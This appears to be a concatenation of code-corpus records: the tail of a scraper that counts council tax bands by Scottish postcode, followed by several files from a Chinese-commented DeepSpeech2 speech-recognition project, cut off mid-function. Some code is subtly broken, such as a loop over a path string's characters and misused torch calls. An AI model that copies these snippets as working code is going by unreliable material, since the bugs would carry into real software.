ML12 6UR ML12 6UT ML12 6UU ML12 6UW ML12 6UX ML12 6UY ML12 6UZ ML12 6WT ML12 6XA ML12 6XB ML12 6XD ML12 6XE ML12 6XF ML12 6XG ML12 6XH ML12 6XJ ML12 6XL ML12 6XQ DG11 3HS DG12 5LG DG12 5RW DG12 6AE DG12 6AH DG12 6AX DG12 6BL DG12 6BP DG12 6NP DG12 6PL DG12 6RE DG12 6TA DG13 0ED DG13 0EL DG13 0JA DG13 0JJ DG13 0JU DG13 0LA DG13 0LX DG13 0PH DG14 0RG DG2 0BS DG2 0LH DG2 0LN DG2 0NA DG2 0NT DG2 0NX DG2 0NY DG2 0PX DG2 0RN DG2 0SQ DG2 0UQ DG2 7BN DG2 7BQ DG2 7DP DG2 7EG DG2 7HD DG2 7HP DG2 7HW DG2 7SG DG2 8BA DG2 8NT DG2 8PG DG2 8PQ DG2 9AJ DG2 9AT DG2 9BB DG2 9BJ DG2 9DA DG2 9DU DG2 9DY DG2 9HD DG2 9SW DG3 4AA DG3 4DT DG3 4EP DG3 4HG DG3 4JH DG3 4LW DG3 5DE DG3 5DU DG3 5HF DG3 5HS DG3 5LR DG3 5LT DG4 6BE DG4 6DD DG4 6EA DG4 6EE DG4 6HP CA6 5AA CA6 5AB CA6 5AD CA6 5AE CA6 5AF CA6 5AG CA6 5AH CA6 5AJ CA6 5AL CA6 5AN CA6 5AP CA6 5AQ CA6 5AR CA6 5AS CA6 5AT CA6 5AU CA6 5AW CA6 5AX CA6 5AY CA6 5AZ CA6 5BA CA6 5BB CA6 5BD CA6 5BE CA6 5BG CA6 5BH CA6 5BJ CA6 5BL CA6 5BN CA6 5BP CA6 5BQ CA6 5BS CA6 5BT CA6 5BU CA6 5BW CA6 5BX CA6 5BY CA6 5BZ CA6 5DA CA6 5DB CA6 5DD CA6 5DE CA6 5DF CA6 5DG CA6 5DH CA6 5DJ CA6 5DL CA6 5DN CA6 5DP CA6 5DQ CA6 5DR CA6 5DS CA6 5DT CA6 5DU CA6 5DW CA6 5DX CA6 5DY CA6 5DZ CA6 5EA CA6 5EB CA6 5ED CA6 5EE CA6 5EF CA6 5EG CA6 5EH CA6 5EJ CA6 5EL CA6 5EN CA6 5EP CA6 5EQ CA6 5ER CA6 5ES CA6 5ET CA6 5EU CA6 5EW CA6 5EX CA6 5EY CA6 5EZ CA6 5HA CA6 5HB CA6 5HD CA6 5HE CA6 5HF CA6 5HG CA6 5HH CA6 5HJ CA6 5HL CA6 5HN CA6 5HP CA6 5HQ CA6 5HR CA6 5HS CA6 5HW CA6 5HX CA6 5HY CA6 5HZ CA6 5JD CA6 5JE CA6 5JF CA6 5JG CA6 5JH CA6 5JJ CA6 5JL CA6 5JN CA6 5JP CA6 5JQ CA6 5JR CA6 5JS CA6 5JT CA6 5JU CA6 5JW CA6 5JX CA6 5JZ CA6 5LA CA6 5LB CA6 5LD CA6 5LE DG1 1AD DG1 1AE DG1 1AU DG1 1BB DG1 1BN DG1 1BQ DG1 1DH DG1 1DN DG1 1DP DG1 1DQ DG1 1LY DG1 1NB DG1 1ND DG1 1NU DG1 1NX DG1 1PH DG1 1PQ DG1 1PY DG1 1QT DG1 1SB DG1 1SN DG1 1TJ DG1 2AF DG1 2AQ DG1 2AS DG1 2AU DG1 2AY DG1 2BB DG1 2BL DG1 2BP DG1 2BW DG1 2BX DG1 2BZ DG1 2DH DG1 2DW DG1 2EA DG1 2EG DG1 2ES DG1 2HW DG1 2LD DG1 1DS DG1 1DY DG1 1DZ DG1 1EE DG1 1EN DG1 1EQ DG1 1ER DG1 1ES DG1 1EY DG1 1EZ DG1 1HQ DG1 1HT DG1 1JS DG1 1LA DG1 1LL DG1 1LQ DG1 1XX DG1 2LW DG1 2NW DG1 2NY DG1 2PT DG1 2PU DG1 2QA DG1 2QJ DG1 2QU DG1 2QY DG1 2QZ DG1 2RD DG1 2RG DG1 2RJ DG1 2SB DG1 3AA DG1 3AF DG1 3BG DG1 3BS DG1 3DH DG1 3EH DG1 3EL DG1 3ER DG1 3HD DG1 3JT DG1 3PZ DG1 3QQ DG1 3TX DG1 4EL DG1 4JD DG1 4SZ DG1 4US DG1 4WQ DG1 4ZA DG1 4ZB DG1 4ZG DG1 4ZH DG1 4ZY DG10 9AF DG10 9AU DG10 9DZ DG10 9EN DG10 9EQ DG10 9EW DG10 9GZ DG10 9NQ DG10 9QD DG10 9QY DG11 1EE DG11 1SD DG11 2BN DG11 2BW DG11 2DD DG11 2HD DG11 2HS DG11 2JN DG11 2JW DG11 2LT DG4 6JR DG4 6LH DG4 6LT DG4 6NF DG4 6NG DG4 6NH DG4 6PJ DG4 6PP DG4 6PS DG4 6PT DG4 6PX DG4 6QD DG4 6QE DG4 6QF DG4 6QG DG4 6RU DG4 6RW DG4 6SQ DG4 6YT DG5 4BD DG5 4JQ DG5 4NG DG5 4UL DG6 4AB DG6 4AY DG6 4DG DG6 4EE DG6 4ET DG6 4LN DG6 4PL DG6 4QX DG6 4RY DG6 4UF DG6 4UQ DG7 1AS DG7 1AW DG7 1DF DG7 1DP DG7 1DY DG7 1HT DG7 1HW DG7 1JR DG7 1JW DG7 1PJ DG7 1PZ DG7 2HN DG7 2NH DG7 3JP DG7 3JR DG7 3JS DG8 0AR DG8 0BP DG8 0ES DG8 0EW DG8 0LQ DG8 0PG DG8 0QS DG8 6BU DG8 6BY DG8 6DP DG8 6ED DG8 6HS DG8 6JP DG8 6JU DG8 6NJ DG8 6NN DG8 6RF DG8 6RG DG8 6SQ DG8 6ST DG8 7AP DG8 7AY DG8 7DD DG8 7DJ DG8 7JD DG8 8LW DG8 8NX DG8 8PA DG8 8PR DG8 8QD DG8 9AE DG8 9AJ DG8 9DG DG8 9LF DG8 9NQ DG8 9PZ DG8 9RW DG8 9SF DG9 0HN DG9 0JG DG9 0JW DG9 0RZ DG9 7DG DG9 7DJ DG9 7DP DG9 7DT DG9 7DY DG9 7EQ DG9 7HG DG9 7HQ DG9 7HZ DG9 7JD DG9 7JR DG9 7JT DG9 7JX DG9 7LE DG9 7NJ DG9 7NR DG9 7NT DG9 7PE DG9 7PF DG9 7PL DG9 7PN DG9 7PP DG9 7PR DG9 7PS DG9 7RG DG9 7RU DG9 7SH DG9 7UA DG9 7UB DG9 8EF DG9 8EL DG9 8EN DG9 8EQ DG9 8JF DG9 8LL DG9 8NH DG9 8PE DG9 8PN DG9 8PU DG9 8RW DG9 8RZ DG9 8TG DG9 8TU DG9 9DS DG9 9DT DG9 9RA ML12 6XN DG1 3FJ DG1 3FR DG1 3FU DG1 3GF DG1 3GJ DG1 3GW DG1 9DW DG11 1UF DG12 6GX DG2 9RG DG3 5JB DG3 5PE DG3 9AA DG5 4FE DG5 4GX DG6 4RE DG6 4RF DG6 4RG DG6 4TB DG7 1LP DG7 2EL DG7 3UJ DG7 3UL DG9 7TZ DG1 3QZ DG2 9RB""" array = array.split('\n') arrayPostCodes = array.copy() arrayBands = [[0 for x in range(8)] for x in range(len(array))] charA = 'A' for i in range(0, len(array)): array[i] = array[i].replace(' ', '+') def Connect2Web(postcode, index): req = urllib.request.Request("http://www.saa.gov.uk/dumgal/search.php?SEARCHED=1&ST&SEARCH_TERM=" + postcode + "&ASSESSOR_ID=dumgal&SEARCH_TABLE=council_tax&x=0&y=0&DISPLAY_COUNT=100#results") resp = urllib.request.urlopen(req) web_pg = resp.read(); #print (web_pg) #regex = "<td style='text-align:center;'>[A-H]</td>" ##localityRegex ="Please select one of the following " localityPattern = re.compile(b"Please select one of the following ") locality = re.findall(localityPattern, web_pg) if (len(locality) != 0): bandList = [] hrefPattern = re.compile(b'\/dumgal\/search\.php\?[^"]*') allLinks = re.findall(hrefPattern, web_pg) for i in range(1, len(allLinks)): allLinks[i] = allLinks[i].decode("utf-8") allLinks[i] = allLinks[i].replace("&amp;", "&") req = urllib.request.Request("http://www.saa.gov.uk" + allLinks[i]) print ("http://www.saa.gov.uk" + allLinks[i]) resp = urllib.request.urlopen(req) web_pg = resp.read() #print (web_pg) pattern = re.compile(b"<td style='text-align:center;'>[A-H]</td>") m = re.findall(pattern, web_pg) #print (m) for i in range (0, len(m)): m[i] = m[i].decode("utf-8") bandList.append(m[i][-6]) for i in range(0, 7): arrayBands[index][i] = bandList.count(chr(ord('A') + i ) ) print (arrayBands[index]) else : pattern = re.compile(b"<td style='text-align:center;'>[A-H]</td>") m = re.findall(pattern, web_pg) for i in range (0, len(m)): m[i] = m[i].decode("utf-8") m[i] = m[i][-6] for i in range(0, 7): arrayBands[index][i] = m.count(chr(ord('A') + i ) ) with open('bands.csv', 'a', newline='') as fp: a = csv.writer(fp, delimiter=',') a.writerow(['Postcode','A','B','C','D','E','F','G','H']) for i in range(0, len(array)): print (i) Connect2Web(array[i], i) a.writerow([arrayPostCodes[i]] + arrayBands[i]) ```
{ "source": "2091527886/mockbirdremark", "score": 2 }
#### File: 2091527886/mockbirdremark/makedataset.py ```python import argparse from ast import arg import functools from matplotlib.pyplot import get from masr.masr import infer_path from masr.masr.predict import Predictor from masr.masr.utils.utils import add_arguments, print_arguments parser = argparse.ArgumentParser(description=__doc__) add_arg = functools.partial(add_arguments, argparser=parser) add_arg('wav_path', str, './dataset/test.wav', "预测音频的路径") add_arg('real_time_demo', bool, False, "是否使用实时语音识别演示") add_arg('use_gpu', bool, True, "是否使用GPU预测") add_arg('to_an', bool, False, "是否转为阿拉伯数字") add_arg('use_pun', bool, False, "是否给识别结果加标点符号") add_arg('nomoreoutput', bool, False, "是否太多输出") add_arg('beam_size', int, 300, "集束搜索解码相关参数,搜索的大小,范围建议:[5, 500]") add_arg('alpha', float, 2.2, "集束搜索解码相关参数,LM系数") add_arg('beta', float, 4.3, "集束搜索解码相关参数,WC系数") add_arg('cutoff_prob', float, 0.99, "集束搜索解码相关参数,剪枝的概率") add_arg('cutoff_top_n', int, 40, "集束搜索解码相关参数,剪枝的最大值") add_arg('use_model', str, 'deepspeech2', "所使用的模型") add_arg('vocab_path', str, 'dataset/vocabulary.txt', "数据集的词汇表文件路径") add_arg('pun_model_dir', str, 'models/pun_models/', "加标点符号的模型文件夹路径") add_arg('model_path', str, 'models/deepspeech2/inference.pt', "导出的预测模型文件路径") add_arg('lang_model_path', str, 'lm/zh_giga.no_cna_cmn.prune01244.klm', "集束搜索解码相关参数,语言模型文件路径") add_arg('feature_method', str, 'linear', "音频预处理方法", choices=['linear', 'mfcc', 'fbank']) add_arg('decoder', str, 'ctc_beam_search', "结果解码方法", choices=['ctc_beam_search', 'ctc_greedy']) add_arg('output', str, '233333333333333', "结果解码方法",) print ("-------------------------------------") args = parser.parse_args() print_arguments(args) print ("-------------------------------------") predictor = Predictor(model_path=args.model_path, vocab_path=args.vocab_path, use_model=args.use_model, decoder=args.decoder, alpha=args.alpha, beta=args.beta, lang_model_path=args.lang_model_path, beam_size=args.beam_size, cutoff_prob=args.cutoff_prob, cutoff_top_n=args.cutoff_top_n, use_gpu=args.use_gpu, use_pun_model=args.use_pun, pun_model_dir=args.pun_model_dir, feature_method=args.feature_method) def get1(x): score, text = predictor.predict(audio_path=x, to_an=args.to_an) return(text) wavpath=args.wav_path pathtemp="" #{ # # # # # # # # # open .... # # from wav path # # # # # # # # # # } returnback="" for x in wavpath: pathtemp=x returnback = get1(pathtemp) #/n ``` #### File: masr/download_data/librispeech.py ```python import argparse import io import os from utility import download, unpack URL_ROOT = "https://openslr.magicdatatech.com/resources/12" URL_TEST_CLEAN = URL_ROOT + "/test-clean.tar.gz" URL_TEST_OTHER = URL_ROOT + "/test-other.tar.gz" URL_DEV_CLEAN = URL_ROOT + "/dev-clean.tar.gz" URL_DEV_OTHER = URL_ROOT + "/dev-other.tar.gz" URL_TRAIN_CLEAN_100 = URL_ROOT + "/train-clean-100.tar.gz" URL_TRAIN_CLEAN_360 = URL_ROOT + "/train-clean-360.tar.gz" URL_TRAIN_OTHER_500 = URL_ROOT + "/train-other-500.tar.gz" MD5_TEST_CLEAN = "32fa31d27d2e1cad72775fee3f4849a9" MD5_TEST_OTHER = "fb5a50374b501bb3bac4815ee91d3135" MD5_DEV_CLEAN = "42e2234ba48799c1f50f24a7926300a1" MD5_DEV_OTHER = "c8d0bcc9cca99d4f8b62fcc847357931" MD5_TRAIN_CLEAN_100 = "2a93770f6d5c6c964bc36631d331a522" MD5_TRAIN_CLEAN_360 = "c0e676e450a7ff2f54aeade5171606fa" MD5_TRAIN_OTHER_500 = "d1a0fd59409feb2c614ce4d30c387708" parser = argparse.ArgumentParser(description=__doc__) parser.add_argument("--target_dir", default="../dataset/audio/", type=str, help="存放音频文件的目录 (默认: %(default)s)") parser.add_argument("--annotation_text", default="../dataset/annotation/", type=str, help="存放音频标注文件的目录 (默认: %(default)s)") args = parser.parse_args() def create_annotation_text(data_dir, annotation_path): print('Create Librispeech annotation text ...') if not os.path.exists(annotation_path): os.makedirs(annotation_path) if not os.path.exists(os.path.join(annotation_path, 'test.txt')): f_train = open(os.path.join(annotation_path, 'librispeech.txt'), 'w', encoding='utf-8') else: f_train = open(os.path.join(annotation_path, 'librispeech.txt'), 'a', encoding='utf-8') if not os.path.exists(os.path.join(annotation_path, 'test.txt')): f_test = open(os.path.join(annotation_path, 'test.txt'), 'w', encoding='utf-8') else: f_test = open(os.path.join(annotation_path, 'test.txt'), 'a', encoding='utf-8') for subfolder, _, filelist in sorted(os.walk(data_dir)): text_filelist = [filename for filename in filelist if filename.endswith('trans.txt')] if len(text_filelist) > 0: text_filepath = os.path.join(subfolder, text_filelist[0]) for line in io.open(text_filepath, encoding="utf8"): segments = line.strip().split() text = ' '.join(segments[1:]).lower() audio_filepath = os.path.join(subfolder, segments[0] + '.flac') if 'test-clean' not in subfolder and 'test-other' not in subfolder and \ 'dev-other' not in subfolder and 'dev-other' not in subfolder: f_train.write(audio_filepath[3:] + '\t' + text + '\n') else: if 'test-clean' in subfolder: f_test.write(audio_filepath[3:] + '\t' + text + '\n') f_test.close() f_train.close() def prepare_dataset(url, md5sum, target_dir, annotation_path): """Download, unpack and create summmary manifest file.""" data_dir = os.path.join(target_dir, 'LibriSpeech') # download filepath = download(url, md5sum, target_dir) # unpack unpack(filepath, target_dir) create_annotation_text(data_dir, annotation_path) def main(): if args.target_dir.startswith('~'): args.target_dir = os.path.expanduser(args.target_dir) prepare_dataset(url=URL_TEST_CLEAN, md5sum=MD5_TEST_CLEAN, target_dir=args.target_dir, annotation_path=args.annotation_text) prepare_dataset(url=URL_DEV_CLEAN, md5sum=MD5_DEV_CLEAN, target_dir=args.target_dir, annotation_path=args.annotation_text) prepare_dataset(url=URL_TRAIN_CLEAN_100, md5sum=MD5_TRAIN_CLEAN_100, target_dir=args.target_dir, annotation_path=args.annotation_text) prepare_dataset(url=URL_TEST_OTHER, md5sum=MD5_TEST_OTHER, target_dir=args.target_dir, annotation_path=args.annotation_text) prepare_dataset(url=URL_DEV_OTHER, md5sum=MD5_DEV_OTHER, target_dir=args.target_dir, annotation_path=args.annotation_text) prepare_dataset(url=URL_TRAIN_CLEAN_360, md5sum=MD5_TRAIN_CLEAN_360, target_dir=args.target_dir, annotation_path=args.annotation_text) prepare_dataset(url=URL_TRAIN_OTHER_500, md5sum=MD5_TRAIN_OTHER_500, target_dir=args.target_dir, annotation_path=args.annotation_text) if __name__ == '__main__': main() ``` #### File: data_utils/augmentor/volume_perturb.py ```python from masr.data_utils.augmentor.base import AugmentorBase class VolumePerturbAugmentor(AugmentorBase): """添加随机体积扰动的增强模型 This is used for multi-loudness training of PCEN. See https://arxiv.org/pdf/1607.05666v1.pdf for more details. :param rng: Random generator object. :type rng: random.Random :param min_gain_dBFS: Minimal gain in dBFS. :type min_gain_dBFS: float :param max_gain_dBFS: Maximal gain in dBFS. :type max_gain_dBFS: float """ def __init__(self, rng, min_gain_dBFS, max_gain_dBFS): self._min_gain_dBFS = min_gain_dBFS self._max_gain_dBFS = max_gain_dBFS self._rng = rng def transform_audio(self, audio_segment): """Change audio loadness. Note that this is an in-place transformation. :param audio_segment: Audio segment to add effects to. :type audio_segment: AudioSegmenet|SpeechSegment """ gain = self._rng.uniform(self._min_gain_dBFS, self._max_gain_dBFS) audio_segment.gain_db(gain) ``` #### File: data_utils/featurizer/audio_featurizer.py ```python import numpy as np from python_speech_features import delta from python_speech_features import logfbank from python_speech_features import mfcc from masr.data_utils.audio import AudioSegment class AudioFeaturizer(object): """音频特征器,用于从AudioSegment或SpeechSegment内容中提取特性。 Currently, it supports feature types of linear spectrogram and mfcc. :param stride_ms: Striding size (in milliseconds) for generating frames. :type stride_ms: float :param window_ms: Window size (in milliseconds) for generating frames. :type window_ms: float :param target_sample_rate: Audio are resampled (if upsampling or downsampling is allowed) to this before extracting spectrogram features. :type target_sample_rate: int :param use_dB_normalization: Whether to normalize the audio to a certain decibels before extracting the features. :type use_dB_normalization: bool :param target_dB: Target audio decibels for normalization. :type target_dB: float """ def __init__(self, feature_method='linear', stride_ms=10.0, window_ms=20.0, target_sample_rate=16000, use_dB_normalization=True, target_dB=-20): self._feature_method = feature_method self._stride_ms = stride_ms self._window_ms = window_ms self._target_sample_rate = target_sample_rate self._use_dB_normalization = use_dB_normalization self._target_dB = target_dB def featurize(self, audio_segment, allow_downsampling=True, allow_upsampling=True): """从AudioSegment或SpeechSegment中提取音频特征 :param audio_segment: Audio/speech segment to extract features from. :type audio_segment: AudioSegment|SpeechSegment :param allow_downsampling: Whether to allow audio downsampling before featurizing. :type allow_downsampling: bool :param allow_upsampling: Whether to allow audio upsampling before featurizing. :type allow_upsampling: bool :return: Spectrogram audio feature in 2darray. :rtype: ndarray :raises ValueError: If audio sample rate is not supported. """ # upsampling or downsampling if ((audio_segment.sample_rate > self._target_sample_rate and allow_downsampling) or (audio_segment.sample_rate < self._target_sample_rate and allow_upsampling)): audio_segment.resample(self._target_sample_rate) if audio_segment.sample_rate != self._target_sample_rate: raise ValueError("Audio sample rate is not supported. " "Turn allow_downsampling or allow up_sampling on.") # decibel normalization if self._use_dB_normalization: audio_segment.normalize(target_db=self._target_dB) # extract spectrogram if self._feature_method == 'linear': return self._compute_linear(audio_segment.samples, audio_segment.sample_rate, stride_ms=self._stride_ms, window_ms=self._window_ms) elif self._feature_method == 'mfcc': samples = audio_segment.to('int16') return self._compute_mfcc(samples=samples, sample_rate=audio_segment.sample_rate, stride_ms=self._stride_ms, window_ms=self._window_ms) elif self._feature_method == 'fbank': samples = audio_segment.to('int16') return self._compute_fbank(samples=samples, sample_rate=audio_segment.sample_rate, stride_ms=self._stride_ms, window_ms=self._window_ms) else: raise Exception('没有{}预处理方法'.format(self._feature_method)) # 用快速傅里叶变换计算线性谱图 @staticmethod def _compute_linear(samples, sample_rate, stride_ms=10.0, window_ms=20.0, eps=1e-14): stride_size = int(0.001 * sample_rate * stride_ms) window_size = int(0.001 * sample_rate * window_ms) truncate_size = (len(samples) - window_size) % stride_size samples = samples[:len(samples) - truncate_size] nshape = (window_size, (len(samples) - window_size) // stride_size + 1) nstrides = (samples.strides[0], samples.strides[0] * stride_size) windows = np.lib.stride_tricks.as_strided(samples, shape=nshape, strides=nstrides) assert np.all(windows[:, 1] == samples[stride_size:(stride_size + window_size)]) # 快速傅里叶变换 weighting = np.hanning(window_size)[:, None] fft = np.fft.rfft(windows * weighting, n=None, axis=0) fft = np.absolute(fft) fft = fft ** 2 scale = np.sum(weighting ** 2) * sample_rate fft[1:-1, :] *= (2.0 / scale) fft[(0, -1), :] /= scale freqs = float(sample_rate) / window_size * np.arange(fft.shape[0]) ind = np.where(freqs <= (sample_rate / 2))[0][-1] + 1 linear_feat = np.log(fft[:ind, :] + eps) # dim=161 return linear_feat @staticmethod def _compute_mfcc(samples, sample_rate, stride_ms=10.0, window_ms=25.0): # 计算MFCC mfcc_feat = mfcc(signal=samples, samplerate=sample_rate, winlen=0.001 * window_ms, winstep=0.001 * stride_ms, highfreq=(sample_rate / 2)) # Deltas d_feat = delta(mfcc_feat, 2) # Deltas-Deltas dd_feat = delta(mfcc_feat, 2) # concat above three features mfcc_feat = np.concatenate((mfcc_feat, d_feat, dd_feat), axis=1) # dim=39 mfcc_feat = mfcc_feat.transpose([1, 0]) return mfcc_feat def _compute_fbank(self, samples, sample_rate, stride_ms=10.0, window_ms=25.0): # 计算fbank fbank_feat = logfbank(signal=samples, samplerate=sample_rate, winlen=0.001 * window_ms, winstep=0.001 * stride_ms, lowfreq=20, highfreq=(sample_rate / 2), wintype='povey') # Deltas d_feat = delta(fbank_feat, 2) # Deltas-Deltas dd_feat = delta(fbank_feat, 2) # concat above three features fbank_feat = np.concatenate((fbank_feat, d_feat, dd_feat), axis=1) # dim=120 fbank_feat = fbank_feat.transpose([1, 0]) return fbank_feat @property def feature_dim(self): """返回特征大小 :return: 特征大小 :rtype: int """ if self._feature_method == 'linear': return 161 elif self._feature_method == 'mfcc': return 39 elif self._feature_method == 'fbank': return 120 else: raise Exception('没有{}预处理方法'.format(self._feature_method)) ``` #### File: masr/decoders/swig_wrapper.py ```python import swig_decoders class Scorer(swig_decoders.Scorer): """Wrapper for Scorer. :param alpha: 与语言模型相关的参数。当alpha = 0时不要使用语言模型 :type alpha: float :param beta: 与字计数相关的参数。当beta = 0时不要使用统计字 :type beta: float :model_path: 语言模型的路径 :type model_path: str """ def __init__(self, alpha, beta, model_path, vocabulary): swig_decoders.Scorer.__init__(self, alpha, beta, model_path, vocabulary) def ctc_greedy_decoder(probs_seq, vocabulary, blank_id): """CTC贪婪(最佳路径)解码器 由最可能的令牌组成的路径将被进一步后处理到去掉连续重复和所有空白 :param probs_seq: 每一条都是2D的概率表。每个元素都是浮点数概率的列表一个字符 :type probs_seq: numpy.ndarray :param vocabulary: 词汇列表 :type vocabulary: list :param blank_index 需要移除的空白索引 :type blank_index int :return: 解码后得到的字符串 :rtype: baseline """ result = swig_decoders.ctc_greedy_decoder(probs_seq.tolist(), vocabulary, blank_id) return result def ctc_beam_search_decoder(probs_seq, vocabulary, beam_size, cutoff_prob=1.0, cutoff_top_n=40, blank_id=0, ext_scoring_func=None): """集束搜索解码器 :param probs_seq: 单个2-D概率分布列表,每个元素是词汇表和空白上的标准化概率列表 :type probs_seq: 2-D list :param vocabulary: 词汇列表 :type vocabulary: list :param beam_size: 集束搜索宽度 :type beam_size: int :param cutoff_prob: 剪枝中的截断概率,默认1.0,没有剪枝 :type cutoff_prob: float :param cutoff_top_n: 剪枝时的截断数,仅在词汇表中具有最大probs的cutoff_top_n字符用于光束搜索,默认为40 :type cutoff_top_n: int :param blank_id 空白索引 :type blank_id int :param ext_scoring_func: 外部评分功能部分解码句子,如字计数或语言模型 :type ext_scoring_func: callable :return: 解码结果为log概率和句子的元组列表,按概率降序排列 :rtype: list """ beam_results = swig_decoders.ctc_beam_search_decoder( probs_seq.tolist(), vocabulary, beam_size, cutoff_prob, cutoff_top_n, ext_scoring_func, blank_id) beam_results = [(res[0], res[1]) for res in beam_results] return beam_results def ctc_beam_search_decoder_batch(probs_split, vocabulary, beam_size, num_processes, cutoff_prob=1.0, cutoff_top_n=40, blank_id=0, ext_scoring_func=None): """Wrapper for the batched CTC beam search decoder. :param probs_seq: 3-D列表,每个元素作为ctc_beam_search_decoder()使用的2-D概率列表的实例 :type probs_seq: 3-D list :param vocabulary: 词汇列表 :type vocabulary: list :param beam_size: 集束搜索宽度 :type beam_size: int :param cutoff_prob: 剪枝中的截断概率,默认1.0,没有剪枝 :type cutoff_prob: float :param cutoff_top_n: 剪枝时的截断数,仅在词汇表中具有最大probs的cutoff_top_n字符用于光束搜索,默认为40 :type cutoff_top_n: int :param blank_id 空白索引 :type blank_id int :param num_processes: 并行解码进程数 :type num_processes: int :param ext_scoring_func: 外部评分功能部分解码句子,如字计数或语言模型 :type ext_scoring_func: callable :return: 解码结果为log概率和句子的元组列表,按概率降序排列的列表 :rtype: list """ probs_split = [probs_seq.tolist() for probs_seq in probs_split] batch_beam_results = swig_decoders.ctc_beam_search_decoder_batch( probs_split, vocabulary, beam_size, num_processes, cutoff_prob, cutoff_top_n, ext_scoring_func, blank_id) batch_beam_results = [[(res[0], res[1]) for res in beam_results] for beam_results in batch_beam_results] return batch_beam_results ``` #### File: model_utils/deepspeech2/conv.py ```python from torch import nn __all__ = ['ConvStack'] class ConvBn(nn.Module): def __init__(self, in_channels, out_channels, kernel_size, stride, input_dim): super().__init__() self.kernel_size = kernel_size self.stride = stride self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride) self.act = nn.GELU() # self.dropout = nn.Dropout() self.output_dim = (input_dim - self.kernel_size) // self.stride + 1 def forward(self, x, x_len): x = self.conv(x) x = self.act(x) # x = self.dropout(x) x_len = ((x_len - self.kernel_size) / self.stride + 1).int() return x, x_len class ConvStack(nn.Module): """具有堆叠卷积层的卷积组 :param feat_size: 输入音频的特征大小 :type feat_size: int :param conv_out_channels: 卷积层输出大小 :type conv_out_channels: int """ def __init__(self, feat_size, conv_out_channels): super().__init__() self.conv1 = ConvBn(in_channels=1, out_channels=conv_out_channels, kernel_size=3, stride=2, input_dim=feat_size) self.conv2 = ConvBn(in_channels=conv_out_channels, out_channels=conv_out_channels, kernel_size=3, stride=2, input_dim=self.conv1.output_dim) self.output_dim = self.conv2.output_dim * conv_out_channels def forward(self, x, x_len): """ x: shape [B, D, T] x_len : shape [B] """ # [B, D, T] -> [B, T, D] x = x.permute(0, 2, 1) # [B, T, D] -> [B, C=1, T, D] x = x.unsqueeze(1) x, x_len = self.conv1(x, x_len) x, x_len = self.conv2(x, x_len) # 将数据从卷积特征映射转换为向量序列 x = x.permute(0, 2, 1, 3) # [B, T, C, D] x = x.reshape([x.shape[0], x.shape[1], -1]) # [B, T, C*D] return x, x_len ``` #### File: masr/model_utils/utils.py ```python import math import torch from torch import nn from masr.model_utils.deepspeech2.model import DeepSpeech2Model __all__ = ['Normalizer', 'DeepSpeech2ModelExport'] # 对数据归一化模型 class Normalizer(nn.Module): def __init__(self, mean, std): super().__init__() self.mean = mean self.std = std self.eps = 1e-20 def forward(self, x): x = (x - self.mean) / (self.std + self.eps) return x # 导出使用的DeepSpeech2Model模型 class DeepSpeech2ModelExport(torch.nn.Module): def __init__(self, model:DeepSpeech2Model, feature_mean, feature_std): super(DeepSpeech2ModelExport, self).__init__() self.normalizer = Normalizer(feature_mean, feature_std) self.model = model # 在输出层加上Softmax self.softmax = torch.nn.Softmax(dim=2) def forward(self, audio, audio_len, init_state_h_box): x = self.normalizer(audio) logits, _, final_chunk_state_h_box = self.model(x, audio_len, init_state_h_box) output = self.softmax(logits) return output, final_chunk_state_h_box class LinearSpecgram(nn.Module): def __init__(self, stride_ms=10.0, window_ms=20.0, audio_rate=16000, use_db_normalization=True, target_db=-20): super().__init__() self._stride_ms = stride_ms self._window_ms = window_ms self._audio_rate = audio_rate self._use_dB_normalization = use_db_normalization self._target_dB = target_db self._eps = 1e-14 self._stride_size = int(0.001 * self._audio_rate * self._stride_ms) self._window_size = int(0.001 * self._audio_rate * self._window_ms) def forward(self, audio): audio = audio.astype(torch.float64) audio = self.normalize(audio) truncate_size = (audio.shape[-1] - self._window_size) % self._stride_size audio = audio[:audio.shape[-1] - truncate_size] windows = self.as_strided(audio, kernel_size=self._window_size, strides=self._stride_size) weighting = self.hanning(self._window_size)[:, None] # 快速傅里叶变换 fft = torch.fft.rfft(windows * weighting, n=None, dim=0) fft = torch.abs(fft) fft = fft ** 2 scale = torch.sum(weighting ** 2) * self._audio_rate fft[1:-1, :] *= (2.0 / scale) fft[0, :] /= scale fft[-1, :] /= scale return torch.log(fft + self._eps) def normalize(self, audio, max_gain_db=300.0): """将音频归一化,使其具有所需的有效值(以分贝为单位)""" gain = self._target_dB - self.rms_db(audio) return self.gain_db(audio, min(max_gain_db, gain)) @staticmethod def gain_db(audio, gain): """对音频施加分贝增益""" audio *= 10. ** (gain / 20.) return audio @staticmethod def rms_db(audio): """返回以分贝为单位的音频均方根能量""" mean_square = torch.mean(audio ** 2) return 10 * torch.log10(mean_square) @staticmethod def as_strided(x, kernel_size, strides): # x.shape[L] kernel_size=320, strides=160 x = x.unsqueeze(0).unsqueeze(0).unsqueeze(0) x = torch.nn.functional.unfold(x, kernel_sizes=[1, kernel_size], stride=strides) x = x.squeeze(0) return x @staticmethod def hanning(M): # M=320 pi = torch.from_numpy(math.pi) n = torch.arange(1 - M, M, 2) k = pi * n / torch.from_numpy((M - 1)) return 0.5 + 0.5 * torch.cos(k) ``` #### File: masr/masr/trainer.py ```python import io import json import os import platform import shutil import sys import time from collections import Counter from datetime import datetime from datetime import timedelta import torch import torch.distributed as dist from torch.optim.lr_scheduler import StepLR from torch.utils.data import DataLoader from tqdm import tqdm from visualdl import LogWriter from masr.data_utils.collate_fn import collate_fn from masr.data_utils.featurizer.audio_featurizer import AudioFeaturizer from masr.data_utils.featurizer.text_featurizer import TextFeaturizer from masr.data_utils.normalizer import FeatureNormalizer from masr.data_utils.reader import MASRDataset from masr.data_utils.sampler import DSRandomSampler, DSElasticDistributedSampler from masr.decoders.ctc_greedy_decoder import greedy_decoder_batch from masr.model_utils.deepspeech2.model import DeepSpeech2Model from masr.model_utils.utils import DeepSpeech2ModelExport from masr.utils.metrics import cer, wer from masr.utils.utils import create_manifest, create_noise, count_manifest, compute_mean_std from masr.utils.utils import labels_to_string class MASRTrainer(object): def __init__(self, use_model='deepspeech2', feature_method='linear', mean_std_path='dataset/mean_std.npz', train_manifest='dataset/manifest.train', test_manifest='dataset/manifest.test', dataset_vocab='dataset/vocabulary.txt', num_workers=8, alpha=2.2, beta=4.3, beam_size=300, num_proc_bsearch=10, cutoff_prob=0.99, cutoff_top_n=40, decoder='ctc_greedy', metrics_type='cer', lang_model_path='lm/zh_giga.no_cna_cmn.prune01244.klm'): 